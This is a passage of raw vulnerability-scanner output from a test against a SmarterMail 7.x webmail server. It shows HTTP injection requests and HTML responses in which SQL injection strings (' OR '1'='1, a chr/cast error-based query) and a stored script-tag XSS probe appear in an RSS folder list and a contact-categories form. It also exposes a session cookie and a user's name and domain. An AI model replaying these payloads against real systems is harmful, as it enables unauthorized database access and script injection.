$split.ResizeHyperSplitter();
$scrollable.ResizeToFit();
ResizeIframes();
isResizing = false;
}
function SplitterResized() {
if (document.ResizeEvent) document.ResizeEvent();
if (document.AdditionalResizeEvent) document.AdditionalResizeEvent();
ResizeIframes();
}
function SplitterLoaded() {
RegisterResizeEvent();
}
function UpdateSplitFrame(page) {
UpdateIFrame(GetSplitPane(), page);
}
$(document).ready(function() {
InitAjaxHandlers();
if (parent.DoneLoading) parent.DoneLoading();
});
</script>




<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_Split_GP_MPH_ctl01(evt) {
$('#ctl00_Split_GP_MPH_ctl01').showHyperContextMenu(evt);
evt.cancelBubble = true;
if (evt.stopPropagation) evt.stopPropagation();
return false;
}
if (parent.UpdateSection && parent.currentSection=='UserRSS') parent.UpdateSection('reload');UpdateSidebarCounts('UserSync', 0);
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fMain\x2ffrmRSS\x2easpx?refreshTree\x3dtrue\x26id\x3d1903019609'); });
var ctl00_Split_GP_MPH_HyperGrid1_Url26530 = new Array();var ctl00_Split_GP_MPH_HyperGrid1_Url26531 = new Array();
function DelayedSetupctl00_Split_GP_MPH_HyperGrid1() {
NavPreviewPane("/Main/frmEmptyPreview.aspx?noitems");
}
if (self.ctl00_Split_GP_MPH_HyperGrid1HGIsCallback)
DelayedSetupctl00_Split_GP_MPH_HyperGrid1();
else
HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_Split_GP_MPH_HyperGrid1, 100);});
self.ctl00_Split_GP_MPH_HyperGrid1HGIsCallback = true;
Sys.Application.initialize();
$(function() { SetTopTitle('Ronald\x20Smith\x20\x2d\x20hoytllc\x2ecom\x20\x2d\x20SmarterMail'); });
$(function() { $('#ctl00_Split').hyperSplitter({"IsHorizontal":false,"Panes":[{"Resizable":true,"SplitBar":false,"MinWidth":300,"MaxWidth":600,"Width":300,"MinHeight":150,"MaxHeight":1600,"Height":200,"ResizeCookieName":"GPSize","_ClientID":"ctl00_Split_GP"},{"Resizable":false,"SplitBar":true,"MinWidth":2,"MaxWidth":2,"Width":2,"MinHeight":2,"MaxHeight":2,"Height":2,"ResizeCookieName":null,"_ClientID":"ctl00_Split_SB"},{"Resizable":false,"SplitBar":false,"MinWidth":100,"MaxWidth":0,"Width":0,"MinHeight":200,"MaxHeight":0,"Height":0,"ResizeCookieName":null,"_ClientID":"ctl00_Split_Frame"}]}); });
function DoEdit_ctl00_Split_GP_BPH_btnRead() {
if(self.ctl00_Split_GP_MPH_HyperGrid1 == null || !self.ctl00_Split_GP_MPH_HyperGrid1.InitializeGrid) return ShowAlertWindow('No item has been selected');
if (ctl00_Split_GP_MPH_HyperGrid1.GetUrlForSelectedRow == null) return;
var url = ctl00_Split_GP_MPH_HyperGrid1.GetUrlForSelectedRow();
if (url != null) { window.open(url); }
else {
if (ctl00_Split_GP_MPH_HyperGrid1.GetSelectedRows().length == 0) ShowAlertWindow('No item has been selected');
else ShowAlertWindow('You can not edit multiple items at once.');
}
}
$(function() { $('#ctl00_Split_GP_MPH_ctl01').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_Split_GP_MPH_ctl01_hm0":"DoEdit_ctl00_Split_GP_BPH_btnRead();"},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>

Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 14:21:32 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24666
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Root Folder - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmRSSList.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE3MTM2NTA1NTEPFgYeCF9fX1RpdGxlBQtSb290IEZvbGRlch4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWCgIDD2QWAgIBD2QWAgIBDw8WAh4LTmF2aWdhdGVVUkwFHC9NYWluL2ZybUFkZFJzcy5hc3B4P2ZvbGRlcj1kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx4HVmlzaWJsZWhkAgYPFgIfBWhkAgcPZBYCZg9kFgICAQ8WAh8FaBYCAgEPFgIeBFRleHRlZAIIDxYCHwVoZBgBBRRjdGwwMCRNUEgkSHlwZXJHcmlkMQ8FJFRydWV8VHJ1ZXx8RmFsc2V8VHJ1ZXx8RmFsc2V8RmFsc2V8MGSLiOZLvy08aG+s1b+dPRERPCDBLw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&amp;t=ffffffff8fb8c655" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>

<script type="text/javascript">
self.EnableAnimations = false;
</script>

<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel1','tctl00$MPH$UpdatePanel1'], ['ctl00$BPH$btnDelete'], [], 90);
//]]>
</script>


<div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
<div class="RoundedPageTitleLeft">
<div id="PageTitle" class="PageTitleText">
Root Folder
</div>
</div>
</div>

<div id="ctl00_ButtonRow" class="ButtonBar">
<div class="ButtonBarLeft">

<div id="ctl00_BPH_btnAdd" class="BBButton"><a class="ButtonBarAnchor" href="%2fMain%2ffrmAddRss%2easpx%3ffolder%3d" onclick="window.location.href = '\x2fMain\x2ffrmAddRss\x2easpx\x3ffolder\x3d'; return false;" tabindex='0'><span class="BBInner">New</span></a></div>
<div id="ctl00_BPH_btnEdit" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoEdit_ctl00_BPH_btnEdit(); return false;"><span class="BBInner">Edit</span></a></div>
<div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" href="#" tabindex='0' onclick="DoDeleteQuery_ctl00_BPH_btnDelete(); return false;"><span class="BBInner">Delete</span></a></div>

</div>
<div class="ButtonBarRight">


</div>
<div class="ButtonBarClear">
<div class="ie6fix">
&nbsp;</div>
</div>
</div>



<span id="ctl00_UpdatePanel1">

</span>

<div id="Scrollable" class="ContentDiv">

<span id="ctl00_MPH_HyperContextMenu1">
<!-- HyperMenu -->
<div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl01' name='ctl00$MPH$ctl01' style='z-index:800'>
<li class='hmItem hmFirst' id='ctl00_MPH_ctl01_hm0' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
<li class='hmItem hmLast' id='ctl00_MPH_ctl01_hm1' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
</ul>
<div class='hmScrollDown'></div></div>
</div>
</span>
<div id="ctl00_MPH_UpdatePanel1">


<div class="HyperGridWrapper" id="ctl00_MPH_HyperGrid1">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_HyperGrid1_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_HyperGrid1CheckAll" name="ctl00$MPH$HyperGrid1CheckAll" /></th><th scope="col" class="ac SmallImage" style="overflow: hidden">&nbsp;</th><th scope="col" style="overflow: hidden">Name</th><th scope="col" class="leftpad" style="overflow: hidden">Title</th><th scope="col" class="leftpad" style="overflow: hidden">Last Updated</th><th scope="col" class="rc ac nw leftpad" style="overflow: hidden">Articles</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>'</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' and(1)=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) or '2'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' and(1)=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) or '2'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' and(1)=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) or '2'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td> ns=netsparker(0x005247) </td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td> ns=netsparker(0x005297) </td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td> ns=netsparker(0x0052C6) </td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' OR '1'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" name="ctl00_MPH_HyperGrid1_CB64_LTE5NTA2Mjk4MTg-" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' OR '1'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:23 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' OR '1'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' OR '1'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" name="ctl00_MPH_HyperGrid1_CB64_MTkwMzAxOTYwOQ--" /></td><td class="ac SmallImage"><img src="/App_Themes/Default/Images/16x16/RSS.gif" align="absmiddle" /></td><td>' OR '1'='1</td><td class="leftpad">Not Available</td><td class="leftpad">Sat, 8:22 PM</td><td class="rc ac nw leftpad">-</td></tr>
<tr class="alt"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_HyperGri..
- /Main/Calendar/frmEvent.aspx

/Main/Calendar/frmEvent.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/Calendar/frmEvent.aspx?dt=10/02/2010&time=8&user=dummy&mapped=false

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

GET /Main/Calendar/frmEvent.aspx?dt=10/02/2010&time=8&user=dummy&mapped=false HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmCalendar.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 14:21:40 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19113
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Calendar - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmEvent.aspx?dt=10%2f02%2f2010&amp;time=8&amp;user=dummy&amp;mapped=false" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTE5MDk3MzY0MA8WCh4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeDF9fRE9OVElOVklURWgeDF9fUmVjdXJyZW5jZWgWAmYPZBYCAgEPZBYKAgMPZBYCAgEPZBYCAgUPDxYCHgdWaXNpYmxlaGRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwVoZAIGDxYCHwVoZAIHD2QWAmYPZBYCAgEPFgIfBWgWAgIBDxYCHgRUZXh0ZWQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWCAICD2QWAgIBD2QWEmYPZBYCAgEPZBYCZg8PFgQeBVdpZHRoGwAAAAAAwHJAAQAAAB4EXyFTQgKAAmRkAgEPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBwUyPGEgaHJlZj0iamF2YXNjcmlwdDogb3BlbnBvcHVwdG8oKTsiPkF0dGVuZGVlczwvYT4fCQICZGQCAQ8PFgQfCgUIIFNldHRpbmcfCQICZBYEZg8UKwACDxYiHhxFbmFibGVFbWJlZGRlZEJhc2VTdHlsZXNoZWV0aB4PU2hvd1RvZ2dsZUltYWdlaB4EU2tpbgUMU21hcnRlclRvb2xzHhZFbmFibGVWaXJ0dWFsU2Nyb2xsaW5naB4SSXRlbVJlcXVlc3RUaW1lb3V0As0CHhpTaG93RHJvcERvd25PblRleHRib3hDbGlja2geE0VuYWJsZUVtYmVkZGVkU2tpbnNoHhNDbG9zZURyb3BEb3duT25CbHVyZx4PQWxsb3dDdXN0b21UZXh0Zx4QRXhwYW5kRWFzaW5nVHlwZQspdVRlbGVyaWsuV2ViLlVJLkFuaW1hdGlvblR5cGUsIFRlbGVyaWsuV2ViLlVJLCBWZXJzaW9uPTIwMTAuMi44MTcuMzUsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MTIxZmFlNzgxNjViYTNkNAAeEkNvbGxhcHNlRWFzaW5nVHlwZQsrBAAeFUF1dG9Db21wbGV0ZVNlcGFyYXRvcgUBOx4SRW5hYmxlTG9hZE9uRGVtYW5kZx4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoHhJTaG93TW9yZVJlc3VsdHNCb3hoHhNFbmFibGVUZXh0U2VsZWN0aW9uaB4eQ2hhbmdlVGV4dE9uS2V5Qm9hcmROYXZpZ2F0aW9uZ2RkFgRmDw8WBB8KBQlyY2JIZWFkZXIfCQICZGQCAQ8PFgQfCgUJcmNiRm9vdGVyHwkCAmRkAgIPDxYGHwcFEkNoZWNrIEF2YWlsYWJpbGl0eR4ISW1hZ2VVcmwFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0dhYW50LmdpZh4LTmF2aWdhdGVVcmwFHWphdmFzY3JpcHQ6IERvQXZhaWxhYmlsaXR5KCk7ZGQCAg9kFgICAQ9kFgJmDw8WBB8IGwAAAAAAwHJAAQAAAB8JAoACZGQCAw9kFgICAQ9kFgJmD2QWAmYPZBYCZg9kFgRmDw8WEB8LaB8RaB8NBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo/MQkfCQICHgxTZWxlY3RlZERhdGUGAMA38h4wzQgfCgUWRGF0ZVRpbWVQaWNrZXJPdmVycmlkZR4HTWluRGF0ZQYAQFcgUwVRCGQWCmYPFCsACA8WGB8LaB4NT3JpZ2luYWxWYWx1ZQUUMTAvMi8yMDEwIDg6MDA6MDAgQU0fEWgfDQUMU21hcnRlclRvb2xzHgxBdXRvUG9zdEJhY2tnHgpEYXRlRm9ybWF0BQFnHhFEaXNwbGF5RGF0ZUZvcm1hdGQfBwUTMjAxMC0xMC0wMi0wOC0wMC0wMB4NTGFiZWxDc3NDbGFzcwUHcmlMYWJlbB8YaB8eBgAA25l6PzEJHyAGAEBXIFMFUQhkFgYfCBsAAAAAAABZQAcAAAAfCgURcmlUZXh0Qm94IHJpSG92ZXIfCQKCAhYGHwgbAAAAAAAAWUAHAAAAHwoFEXJpVGV4dEJveCByaUVycm9yHwkCggIWBh8IGwAAAAAAAFlABwAAAB8KBRNyaVRleHRCb3ggcmlGb2N1c2VkHwkCggIWBh8IGwAAAAAAAFlABwAAAB8KBRNyaVRleHRCb3ggcmlFbmFibGVkHwkCggIWBh8IGwAAAAAAAFlABwAAAB8KBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8JAoICFgYfCBsAAAAAAABZQAcAAAAfCgURcmlUZXh0Qm94IHJpRW1wdHkfCQKCAhYGHwgbAAAAAAAAWUAHAAAAHwoFEHJpVGV4dEJveCByaVJlYWQfCQKCAmQCAQ8PFgQfHAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYeDUhvdmVySW1hZ2VVcmwFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmFgIeB29uY2xpY2sFS3JldHVybiBDYWxlbmRhclBvcHVwKCRmaW5kKCdjdGwwMF9NUEhfU3RhcnREYXRlUGlja2VyX1NldHRpbmdUZXh0JyksJ2NhbCcpO2QCAg8UKwANDxYaBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQULU3BlY2lhbERheXMPBZIBVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuQ2FsZW5kYXJEYXlDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1